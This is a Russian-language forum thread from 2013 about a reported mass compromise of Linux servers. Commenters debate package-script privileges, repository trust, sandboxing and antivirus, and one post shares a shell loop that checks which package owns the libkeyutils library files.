89. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:31 
> Кто виноват? Виноваты вы. Что делать? Почитать о том, какие права стоят
> на симлинках и что они значат.

а причём тут права ? меня больше волнует вопрос "какого х^W фига либа в корне?"
и я этот симлинк не создавал http://www.opennet.dev/openforum/vsluhforumID3/88727.html#85
я всё ещё виноват ?

Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

60. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:13 
а что до "левых скриптов" - их же кто-то запустил с соответствующими правами, верно? Угадайте, кто?
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

78. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:24 
> а что до "левых скриптов" - их же кто-то запустил с соответствующими
> правами, верно? Угадайте, кто?

а какие варианты ? вот серьёзно - какие дистрибутивы не запускают скрипты идущие внутри пакета от рута ? кроме видимо тех где собираются пакеты из исходников, да и то вроде от рута скрипты при этом пускают, но таких я мало дистрибов щупал

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

83. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:26 
>> а что до "левых скриптов" - их же кто-то запустил с соответствующими
>> правами, верно? Угадайте, кто?
> а какие варианты ? вот серьёзно - какие дистрибутивы не запускают скрипты
> идущие внутри пакета от рута ?

Да тот же pkgsrc, который можно на любой дистрибутив установить. Да и многие другие пакетники можно до этого легко доработать - это НЕ проблема. И с рутом проблемы нет, есть проблемы куда серьёзнее.

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

102. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:48 
Левые скрипты, не проверенные маинтайнером и не подписанные ключом дистрибутива? И кто ж такое запускает?

А те, что в соответствующих пакетах из репозитория- таки да, это доверенный код. Если будут проблемы - можете проглядеть его глазами, всё открыто. И эта модель в общем показала себя достаточно хорошо для большинства применений. Для более жестких условий есть масса ограничительной механики, но в массовом случае от неё вреда больше чем пользы. Обратная ситуация только там, где коду вообще доверя нет, как в андроиде или в браузере. Ну и особняком Эппл, где ограничения - способ обеспечить контроль за пользователем в основном.

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору
Часть нити удалена модератором

152. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:32 
> хотяб пачку презервативов ?.......

Так я не понимаю: что мешает ее взять? В том же лине просто искаропки KVM-виртуализатор есть, LXC-контейнеры и чего там еще. Айпитаблес опять же. И что там еще.

...только вам все это не поможет, если вы будете админить сие из винды с варезника где фиг знает чего напихано, наустановив черти-какого вареза с крякерских сайтов, пополам с троянами.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

192. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:19 
Пачку презервативов до вас применял маинтайнер. И если вы сидите не на федоре какой - всё успели проверить на себе те, кто на федоре, арче и тому подобных, где не так боятся проблем. Так что проблемы, дошедшие до вас - это исключительный случай, обычно (не всегда) не стоящий возни с дополнительной защитой.
Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

230. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от JL2001 (ok) on 19-Фев-13, 17:54 
> Пачку презервативов до вас применял маинтайнер. И если вы сидите не на
> федоре какой - всё успели проверить на себе те, кто на
> федоре, арче и тому подобных, где не так боятся проблем. Так
> что проблемы, дошедшие до вас - это исключительный случай, обычно (не
> всегда) не стоящий возни с дополнительной защитой.

вы в общем-то правы, но случаи бывают разные
можно мне официальный реп vlc последней версии для убунты ? иначе я "просто доверяю" каким-то чувакам с ланчпада...

Ответить | Правка | ^ к родителю #192 | Наверх | Cообщить модератору

239. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:59 
Для убунты - не знаю, нет её у меня. В дебиане - есть в sid.
Ответить | Правка | ^ к родителю #230 | Наверх | Cообщить модератору

329. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:48 
> "просто доверяю" каким-то чувакам с ланчпада...

Ну так вы и в случае использования vlc "просто доверяете" каким-то там коммитерам vlc, если уж на то пошло.

Ответить | Правка | ^ к родителю #230 | Наверх | Cообщить модератору

476. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 20-Фев-13, 12:22 
>> "просто доверяю" каким-то чувакам с ланчпада...
> Ну так вы и в случае использования vlc "просто доверяете" каким-то там
> коммитерам vlc, если уж на то пошло.

ну так я только за если vlc будет иметь права на чтение-запись только в папку с видео-музыкой, а про ~/.mozilla/firefox/ чтоб вообще узнать не мог, даже если vlc из "официальных репов дистриба"

Ответить | Правка | ^ к родителю #329 | Наверх | Cообщить модератору

544. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 19:05 
На практике вы либо придёте к айпадовской модели "каждому приложению свою копию файла" (что, понятное дело, бред - там одно приложение другому файлы чуть ли не электронной почте шлет) либо задолбаетесь возиться с разрешениями - тут файрфоксом видюшку скачал, тут друг на флешке принес что-то, тут приложение какое-то обратилось к vlc чтобы что-то проиграл, тут папка, синхронизированная с дропбоксом... И т.д.

Понимаете, сила современного (или уже не современного?) десктопа как раз в том, что приложения друг о друге знают и могут кооперироваться. И ломать это добровольно - глупо.

Ответить | Правка | ^ к родителю #476 | Наверх | Cообщить модератору

595. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 21-Фев-13, 00:49 
> На практике вы либо придёте к айпадовской модели "каждому приложению свою копию
> файла" (что, понятное дело, бред - там одно приложение другому файлы
> чуть ли не электронной почте шлет) либо задолбаетесь возиться с разрешениями
> - тут файрфоксом видюшку скачал, тут друг на флешке принес что-то,
> тут приложение какое-то обратилось к vlc чтобы что-то проиграл, тут папка,
> синхронизированная с дропбоксом... И т.д.
> Понимаете, сила современного (или уже не современного?) десктопа как раз в том,
> что приложения друг о друге знают и могут кооперироваться. И ломать
> это добровольно - глупо.

у меня браузер от отдельного юзера и торент, настроил общую группу на чтение, а торент-файлы, например, переносятся-удаляются всё равно через торентокачалку
всё это достаточно решаемо, некоторые так вообще айтюнсом пользуются и нахваливают - им хватает

Ответить | Правка | ^ к родителю #544 | Наверх | Cообщить модератору

649. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 16:17 
> ну так я только за если vlc будет иметь права на чтение-запись
> только в папку с видео-музыкой, а про ~/.mozilla/firefox/ чтоб вообще узнать
> не мог, даже если vlc из "официальных репов дистриба"

Ну так вы в вашем праве засунуть его в контейнер с такими правами. Надо ли это по дефолту - вопрос интересный. А как узнать где у некоего пользователя видео лежит? Тем не менее, если кому зудит - есть прекрасные фильтры сисколов, позволяющие фильтровать системные вызовы и их параметры. Если паранойя долбит - юзайте.

Вот например чуваки http://codepad.org/ не боятся твой севый код запускать. А что, взломаешь перчиков? Тебе дадены все рули в лапы - можешь свой сплойт на сях заливать :)

Ответить | Правка | ^ к родителю #476 | Наверх | Cообщить модератору

116. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:01 
> lrwxrwxrwx 1 root root 36 дек.   5 03:54 /libnss3.so ->
> /usr/lib/x86_64-linux-gnu/libnss3.so

...
> установочные скрипты ИЗ левого ПАКЕТА запускаются с правами рута - это
> додуматься ж надо до такого....)

Откуда из этой информации видно что оно пускается от рута? Отсюда видно лишь что owner'ом файла является рут. А вот это правильно - а чего-это какие-то левые субъекты будут в обход рута исполняемое файло в системе менять? Может быть, виндузоидам до того как истерически биться в конвульсиях надо бы немного RTFMать хотя-бы?

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

127. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 16:08 
> Откуда из этой информации видно что оно пускается от рута? Отсюда видно
> лишь что owner'ом файла является рут.

отсюда видно ?
ls -la /
drwxr-xr-x   1 root root  296 февр. 18 10:25 ./
drwxr-xr-x   1 root root  296 февр. 18 10:25 ../
кто у нас в корне мог создать ссылку кроме рута ?

Ответить | Правка | ^ к родителю #116 | Наверх | Cообщить модератору

80. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:25 
> Защита одних программ от других хороша в теории, а на практике приносит
> столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый
> риск взлома.

Назад, в будущ^wDOS?

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

105. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:50 
Нет, всего лишь выбираем оптимум для каждого случая. Где-то - одна прошивка в одном адресном пространстве. Где-то - навороченная система доступов и привилегий, вплоть до виртуализации всего и вся, как в Cubes. А обычно доверия маинтайнерам и осторожности при подключения новых реп вполне хватает.
Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

43. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 15:01 
> тогда мы идём к вам[/offtop]

"Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

47. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:02 
>> тогда мы идём к вам[/offtop]
> "Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)

"всех не перевешаете!" (с)

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

588. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 00:00 
> "всех не перевешаете!" (с)

Оно и не надо - сами вымрете.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

731. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2013 on 25-Фев-13, 22:01 
>>> тогда мы идём к вам[/offtop]
>> "Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)
> "всех не перевешаете!" (с)

" ..., но стремиться к этому нужно!"

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

59. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от anonymous (??) on 19-Фев-13, 15:12 
> [offtop]
>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
> вашему линуксу не нужна защита одних программ от других программ ?
> тогда мы идём к вам[/offtop]

Привет, Жека. Что, опять продажи падают?

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

82. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:26 
>> [offtop]
>>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
>> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>> вашему линуксу не нужна защита одних программ от других программ ?
>> тогда мы идём к вам[/offtop]
> Привет, Жека. Что, опять продажи падают?

если вы про антивирус - то вы меня спутали
зы: я не предлагаю антивирьё (по моему мнению оно бесполезно процентов на 75), скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в комплекте с пакетом в глобальном окружении, контейнеры и виртуалки

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

115. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:01 
>>> [offtop]
>>>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
>>> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>>> вашему линуксу не нужна защита одних программ от других программ ?
>>> тогда мы идём к вам[/offtop]
>> Привет, Жека. Что, опять продажи падают?
> если вы про антивирус - то вы меня спутали
> зы: я не предлагаю антивирьё (по моему мнению оно бесполезно процентов на
> 75), скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
> комплекте с пакетом в глобальном окружении, контейнеры и виртуалки

Трындишь, косой. Наличие антивируса (что на клиенте - чего-то приличного, например, Симантек, что на сервере - тот же Clam) по статистике не от Фороникса и не от производителей снижает риск занесения хомячьем чего-то потенциально и кинетически опасного минимум вдвое. Имея, разумеется, в виду достаточно типовую не для РиК инфраструктуру (т.е. клиенты на винде, серверы на никсах).

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

120. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:04 
> скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
> комплекте с пакетом в глобальном окружении, контейнеры и виртуалки

Так все это в лине есть. Тем не менее, даже раздолбаная виртуалка - это все-таки неприятно, так что разбор полетов проводить все-таки надо.

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

135. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 16:18 
>> скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
>> комплекте с пакетом в глобальном окружении, контейнеры и виртуалки
> Так все это в лине есть. Тем не менее, даже раздолбаная виртуалка
> - это все-таки неприятно, так что разбор полетов проводить все-таки надо.

а кто-то на луну говрят летал, а кто-то чемпион олимпии
хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в этом направлении а не прятали голову в песок как многие в этом треде

зы: я сам не потяну быть мантейнером этого, мне бы со своим локалхостом разобраться бы, именно поэтому я хочу чтоб было на кого положится и чтоб ошибки мантейнеров не стали ошибками на моём локалхосте

Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

161. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:40 
> хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в
> этом направлении а не прятали голову в песок как многие в этом треде

Как бы это сказать? Чем стандартнее меры безопасности у лично вас на серваке, тем вероятнее что хаксоры будут в курсе их наличия и задумаются об их обходе "по умолчанию" в автоматических атаках. Стало быть, хороший админ должен по возможности добавить кастомных плюшек от себя. Чтобы повысить вероятность того что хаксор застрянет в любезно предоставленном ему капкане.

Ответить | Правка | ^ к родителю #135 | Наверх | Cообщить модератору

478. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 20-Фев-13, 12:29 
>> хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в
>> этом направлении а не прятали голову в песок как многие в этом треде
> Как бы это сказать? Чем стандартнее меры безопасности у лично вас на
> серваке, тем вероятнее что хаксоры будут в курсе их наличия и
> задумаются об их обходе "по умолчанию" в автоматических атаках. Стало быть,
> хороший админ должен по возможности добавить кастомных плюшек от себя. Чтобы
> повысить вероятность того что хаксор застрянет в любезно предоставленном ему капкане.

если стандартные меры действенны то их надо внедрять повсеместно
хацкеры в курсе что от рута обычно не сидят и задумываются об обходе этого умолчания - но это же не повод сидеть под рутом !
так почему например по дефолту все пакеты должны иметь доступ к конфигам других пакетов в ~/.config/ ?

Ответить | Правка | ^ к родителю #161 | Наверх | Cообщить модератору

479. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 12:38 
> если стандартные меры действенны то их надо внедрять повсеместно

https://help.ubuntu.com/community/AppArmor

Ответить | Правка | ^ к родителю #478 | Наверх | Cообщить модератору

486. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 20-Фев-13, 13:11 
>> если стандартные меры действенны то их надо внедрять повсеместно
> https://help.ubuntu.com/community/AppArmor

вы предлагаете каждому хомячку самостоятельно настраивать профайлы ?
это примерно как выслать в школы диски с линуксом но он с них не устанавливается - а чего, юзеры сами с инета скачают и установят

цитата меня любимого "хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в этом направлении а не прятали голову в песок как многие в этом треде" (с)

Ответить | Правка | ^ к родителю #479 | Наверх | Cообщить модератору

488. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 13:18 
> вы предлагаете каждому хомячку самостоятельно настраивать профайлы ?

Тем, кто не умеет читать - да. Предлагаю. Только они это не прочитают, и не узнают, что я им предлагаю.

Ответить | Правка | ^ к родителю #486 | Наверх | Cообщить модератору

590. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 00:11 
> если стандартные меры действенны то их надо внедрять повсеместно

Так внедряют. Если озадачиться вопросом и изучить его, окажется что ALSR, W^X, различные защиты стека и т.п. со стороны компилера и прочая - уже давно внедрены в более-менее цивильных дистрах.

> хацкеры в курсе что от рута обычно не сидят и задумываются об
> обходе этого умолчания - но это же не повод сидеть под рутом !

И много вы линуксоидов видели которые в крейсерском режиме под рутом сидят? Линукс прекрасно юзабелен из-под лимитированного юзера. И как правило

> так почему например по дефолту все пакеты должны иметь доступ к конфигам
> других пакетов в ~/.config/ ?

Потому что пакеты может вкатывать только рут (что логично - а чего это некто левый будет софт в системе тасовать?). Пакетный менеджер - программа с повышенными привилегиями. Она может совершать административные действия. Это зачастую попросту необходимо для установки пакетов.

И да, вы не должны инсталлировать недоверяемые программы. В том числе и через пакетный менеджер. Если вы не доверяете репозиторию - просто не используйте его. А если вы ставите недоверемую программу, она так или иначе может вас поиметь, заэнфорсив какую-то вредную или нежелательную для вас логику поведения. Как еще понятнее это объяснить - я не знаю. Если надо нечто заведомо проблемное - ну гоняйте его на виртуалочках, как это те же аверы делают, например. Желательно на отдельном изолированном хосте, на случай если пакость шибко борзая и каким-то чудом виртуализатор прошибет, мало ли, баги все-таки везде бывают.

Ответить | Правка | ^ к родителю #478 | Наверх | Cообщить модератору

625. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от JL2001 (ok) on 21-Фев-13, 11:55 
> ALSR, W^X, различные защиты стека и т.п. со стороны компилера и прочая -
> уже давно внедрены в более-менее цивильных дистрах.

это хорошо, но стоит двигаться дальше

> Линукс прекрасно юзабелен из-под лимитированного юзера. И как правило

о том и речь - так же удобно можно сделать чтоб отдельные программы сидели с раздельными правами на свой каталог настройки, на общее хранилише

>> так почему например по дефолту все пакеты должны иметь доступ к конфигам
>> других пакетов в ~/.config/ ?
> Потому что пакеты может вкатывать только рут (что логично - а чего
> это некто левый будет софт в системе тасовать?). Пакетный менеджер -
> программа с повышенными привилегиями. Она может совершать административные действия.
> Это зачастую попросту необходимо для установки пакетов.

это нифига не логично, ни то что одни программы юзерского уровня имеют доступ к другим программам юзерского уровня
ни то что пакетный менеджер запускает скрипты из пакетов под собственным юзером (рутом !!)
распаковал, сделал загончик для пакета, сбросил права до юзер_пакетНейм - запустил скрипты с пакета - вот как логично

> И да, вы не должны инсталлировать недоверяемые программы. В том числе и
> через пакетный менеджер. Если вы не доверяете репозиторию - просто не
> используйте его. А если вы ставите недоверемую программу, она так или
> иначе может вас поиметь, заэнфорсив какую-то вредную или нежелательную для вас
> логику поведения. Как еще понятнее это объяснить - я не знаю.
> Если надо нечто заведомо проблемное - ну гоняйте его на виртуалочках,
> как это те же аверы делают, например. Желательно на отдельном изолированном
> хосте, на случай если пакость шибко борзая и каким-то чудом виртуализатор
> прошибет, мало ли, баги все-таки везде бывают.

ну вот - других то нет ! нет доверенного vlc (последней версии) для убунты ! и чем линукс лучше винды тут ? так же заставляет идти на варезник (ланчпад) и не даёт из коробки средств юзеру чувствовать себя сухо и комфортно при этом, скорее даже наоборот
при том что в винде уже давно есть инфраструктура "по правой кнопке мыши запустить из песочницы" и она оказывается более защищённой (как ни странно)

Ответить | Правка | ^ к родителю #590 | Наверх | Cообщить модератору

648. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 16:13 
> И да, вы не должны инсталлировать недоверяемые программы.

Рекомендация ничем не отличается от "не кликайте на фотки "Здесь голая Курникова"
Сразу возникает вопрос - преимущество то где ?

Ответить | Правка | ^ к родителю #590 | Наверх | Cообщить модератору

28. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 14:45 
for LIB in /lib/libkeyutils* /lib64/libkeyutils*; do echo $LIB; rpm -qf $LIB; echo; done
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +7 +/
Сообщение от Аноним (??) on 19-Фев-13, 14:50 
В общем, это доказывает слова экспертов о несостоятельности утверждений об абсолютно надежной архитектуре, и о том, что незыблемая защищенность - просто проявление принципа "неуловимого Джо". Кстати говоря, повышение популярности платформы, кроме банального повышения интереса к ней хакеров (более тщательный поиск уязвимостей), способствует привлечению к написанию кода (системы и окружения) всё большего числа программистов, среди которых растет и число тех, в ком довольно слабо развита дисциплина качественного и надежного кодирования (возникновение большего числа уязвимостей).
Однако, системы с открытым исходным кодом, как правило, характеризуются максимально малым временем локализации и исправления критических ошибок и уязвимостей (поскольку открытый код позволяет вести параллельный анализ сразу большому числу независимых специалистов), так что брешь закроют очень скоро. В отличие от... :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

55. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:10 
Да, теоретически, каждый разработчик может оказаться мудаком. Или microsoft может зарядить сотню разведчиков, чтобы они вели себя, как добропорядочные, но в нужный момент сделали бы какое-нибудь деяние для дискредитации и нового всплеска продаж windows server.

Но для защиты от этого нужно искоренять не открытое и свободное ПО, а мудаков.

Кроме того, свободные ОС не заканчиваются на Linux. Там, где нужна безопасность - есть свои решения, свободные, с более строгим аудитом. Когда кто-то не умеет пользоваться выбором, надевает первое, что под руку попало, а потом говорит, что не подошло - это вопрос только к тем, кто доверил этому товарищу настраивать компьютеры, а не к операционной системе. Можно и пароль на root не задать, а потом плакать, что ломают.


Абсолютно надёжного ничего не бывает, но принципы свободного как раз защищают от многих типов проблем и закладок. А когда кто-то с упорством дворника тащит несвободно, плача и ругая всех вокруг, а потом удивляется, почему его не защитило свободное - ну что тут скажешь... К сожалению, очень много тех, кто не понимает даже самых базовых принципов, но мнение имеет. Тех, кто эти принципы понимает, ломают гораздо реже. :)

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

180. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 17:09 
Позволю тебе процитировать самого тебя:

> его не защитило свободное - ну что тут скажешь... К сожалению,
> очень много тех, кто не понимает даже самых базовых принципов, но
> мнение имеет.

Ты о себе это написал. Поздравляю. Очень самокритично.


Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

333. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:57 
И тем не менее, он кое в чем прав.
1) Если вас поймают на бэкдоринге - это слив репутации на всю жизнь. Это достаточно высокая ставка и достаточно хороший стопор даже для горячих голов. Потому что добиться уважения в открытом сообществе требует неких усилий. И все проср@ть в 1 момент - достаточно обидная перспектива.
2) Таки были прецеденты попыток внедрения безобидно выглядящих бэкдоров замаскированных под опечатку в линуксовый кернел. И таки они были запалены. Так что такие тезисы подтверждаются и вполне конкретными прецедентами.
Ответить | Правка | ^ к родителю #180 | Наверх | Cообщить модератору

33. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от manefesto email(??) on 19-Фев-13, 14:54 
А по факту для энтерпрайз систему это фиаско, не иначе
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +8 +/
Сообщение от б.б. on 19-Фев-13, 14:58 
> А по факту для энтерпрайз систему это фиаско, не иначе

Тогда Windows бы вообще не существовало ни в каком виде. :) После Code Red и MSBlast в любой другой отрасли уже давно сделали бы групповое самоубийство и покрылись миллиардными штрафами. А они за это ещё и деньги берут. :)

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

117. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:02 
>> А по факту для энтерпрайз систему это фиаско, не иначе
> Тогда Windows бы вообще не существовало ни в каком виде. :) После
> Code Red и MSBlast в любой другой отрасли уже давно сделали
> бы групповое самоубийство и покрылись миллиардными штрафами. А они за это
> ещё и деньги берут. :)

Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус? Еще тогда, после слома Кернел.орг?

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

121. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:05 
> Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус?
> Еще тогда, после слома Кернел.орг?

Кому был приченён ущерб? Имена, фамилии, явки.

А msblast, по-моему, до сих пор можно словить в диком виде, если просто установить систему без сервис-паков и вывести в интернет :)

Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

123. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:06 
> Еще тогда, после слома Кернел.орг?

Кернелорг ломанула какая-то автоматическая фигня, ворующая ключи ssh. Так вот просто и банально. Подобная же фигня ломанула у фрибздельников серваки.

Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

136. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 16:20 
>>> А по факту для энтерпрайз систему это фиаско, не иначе
>> Тогда Windows бы вообще не существовало ни в каком виде. :) После
>> Code Red и MSBlast в любой другой отрасли уже давно сделали
>> бы групповое самоубийство и покрылись миллиардными штрафами. А они за это
>> ещё и деньги берут. :)
> Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус?
> Еще тогда, после слома Кернел.орг?

потому что непатченый линукс встречается так же часто, как и непатченая винда. некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее.  

Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

138. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:23 
> потому что непатченый линукс встречается так же часто, как и непатченая винда.
> некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее.

"По плодам их узнаете их". Говорить можно всё, что угодно, но где реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных свободных ОС, где хаос и разрушения?

Ответить | Правка | ^ к родителю #136 | Наверх | Cообщить модератору

181. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 17:10 
>> потому что непатченый линукс встречается так же часто, как и непатченая винда.
>> некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее.
> "По плодам их узнаете их". Говорить можно всё, что угодно, но где
> реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных
> свободных ОС, где хаос и разрушения?

Интернет, батенька, появился задолго до того, как линукс вырос из коротких штанишек. Учите историю - за умного сойдете.

Ответить | Правка | ^ к родителю #138 | Наверх | Cообщить модератору

185. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:12 
> Интернет, батенька, появился задолго до того, как линукс вырос из коротких штанишек.
> Учите историю - за умного сойдете.

А Волга впадает в Каспийское море.

Разумеется, что вы можете сделать с ответом, который напрочь опровергает все ваши теории о безопасности и небезопасности? Только покривляться.

Ответить | Правка | ^ к родителю #181 | Наверх | Cообщить модератору

189. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Михрютка (ok) on 19-Фев-13, 17:17 
> "По плодам их узнаете их". Говорить можно всё, что угодно, но где
> реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных
> свободных ОС, где хаос и разрушения?

вы отвечаете явно не на мой камент. я чо-та не помню, чтобы я говорил о хаосе и разрушениях. я говорил о непатченых системах.

Ответить | Правка | ^ к родителю #138 | Наверх | Cообщить модератору

193. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:20 
> вы отвечаете явно не на мой камент. я чо-та не помню, чтобы
> я говорил о хаосе и разрушениях. я говорил о непатченых системах.

Что значит "непатченная система"? В ядре вообще уязвимости редки, остальное обновляется "на лету". Поэтому проблем с длинными аптаймами нет, разрушений от этих аптаймов нет, а сравнение аптаймами с виндой, где на каждый чих перезагрузка требуется, вообще некорректно.

Тем более, есть ksplice. Поэтому маленький аптайм - это проблема, и срочно к доктору! Или джип.

Ответить | Правка | ^ к родителю #189 | Наверх | Cообщить модератору

245. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Михрютка (ok) on 19-Фев-13, 18:02 
